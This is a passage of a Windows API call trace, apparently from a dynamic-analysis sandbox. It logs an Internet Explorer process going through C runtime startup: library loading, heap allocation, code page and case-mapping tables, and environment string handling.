	[0191.188] GetLastError () returned 0x57
	[0191.188] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0191.189] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0191.189] GetLastError () returned 0x57
	[0191.189] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76b10000
	[0191.189] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0191.189] GetLastError () returned 0x57
	[0191.190] GetProcAddress (hModule=0x76b10000, lpProcName="FlsGetValue") returned 0x76b61e16
	[0191.190] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x364) returned 0x329c80
	[0191.190] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0191.190] SetLastError (dwErrCode=0x57) 
	[0191.190] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc00) returned 0x33a6e0
	[0191.191] GetStartupInfoW (in: lpStartupInfo=0x551fa14 | out: lpStartupInfo=0x551fa14*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="Microsoft.InternetExplorer.Default", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1001, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1a23130, hStdOutput=0x75f9cac0, hStdError=0xfffffffe)) 
	[0191.191] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0191.191] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0191.191] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0191.191] GetCommandLineA () returned="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" -nohome"
	[0191.191] GetCommandLineW () returned="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" -nohome"
	[0191.191] GetLastError () returned 0x57
	[0191.191] SetLastError (dwErrCode=0x57) 
	[0191.191] GetLastError () returned 0x57
	[0191.191] SetLastError (dwErrCode=0x57) 
	[0191.191] GetACP () returned 0x4e4
	[0191.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x220) returned 0x2f280b8
	[0191.191] IsValidCodePage (CodePage=0x4e4) returned 1
	[0191.191] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x551fa44 | out: lpCPInfo=0x551fa44) returned 1
	[0191.191] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x551f30c | out: lpCPInfo=0x551f30c) returned 1
	[0191.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x551f920, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0191.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x551f920, cbMultiByte=256, lpWideCharStr=0x551f0a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0191.191] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x551f320 | out: lpCharType=0x551f320) returned 1
	[0191.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x551f920, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0191.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x551f920, cbMultiByte=256, lpWideCharStr=0x551f058, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0191.191] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0191.191] GetLastError () returned 0x57
	[0191.191] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0191.194] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringEx") returned 0x76b9f72b
	[0191.194] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0191.194] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x551ee48, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0191.194] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x551f820, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x0c\x14\x0b\x71\x5c\xfa\x51\x05\xce\x6c\xa2\x01\xb8\x80\xf2\x02\xb8\x80\xf2\x02\x70\x35\xa3\x01\xff\xff\xff\xff", lpUsedDefaultChar=0x0) returned 256
	[0191.194] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x551f920, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0191.194] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x551f920, cbMultiByte=256, lpWideCharStr=0x551f078, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虷ƢĀ") returned 256
	[0191.194] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虷ƢĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0191.195] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虷ƢĀ", cchSrc=256, lpDestStr=0x551ee68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256
	[0191.195] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x551f720, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x0c\x14\x0b\x71\x5c\xfa\x51\x05\xce\x6c\xa2\x01\xb8\x80\xf2\x02\xb8\x80\xf2\x02\x70\x35\xa3\x01\xff\xff\xff\xff", lpUsedDefaultChar=0x0) returned 256
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2e93c8
	[0191.195] RtlInitializeSListHead (in: ListHead=0x1a33ae8 | out: ListHead=0x1a33ae8) 
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x800) returned 0x335f10
	[0191.195] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0191.195] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1a33bd8, nSize=0x104 | out: lpFilename="C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe")) returned 0x2f
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x44) returned 0x2ef67f0
	[0191.195] GetEnvironmentStringsW () returned 0x2ef4740*
	[0191.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1249, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1249
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4e1) returned 0x2f026e0
	[0191.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1249, lpMultiByteStr=0x2f026e0, cbMultiByte=1249, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1249
	[0191.195] FreeEnvironmentStringsW (penv=0x2ef4740) returned 1
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8c) returned 0x32b108
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1f) returned 0x2f149b8
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x37e228
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x31) returned 0x2eff870
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x16) returned 0x2f022f8
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x37e8b0
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x14) returned 0x2f02318
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xd) returned 0x303608
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1d) returned 0x2f149e0
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x31) returned 0x2eff8b0
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x17) returned 0x2f02338
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x17) returned 0x2f02358
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xe) returned 0x2efe2f8
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb1) returned 0x325418
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3e) returned 0x2c3d78
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1b) returned 0x2f14a08
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x44) returned 0x2ef6390
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x12) returned 0x2f02378
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2f02398
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1b) returned 0x2f14a30
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1e) returned 0x2f14a58
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2efe2b0
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x41) returned 0x2ef67a0
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x17) returned 0x2f023b8
	[0191.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x14) returned 0x2f023d8
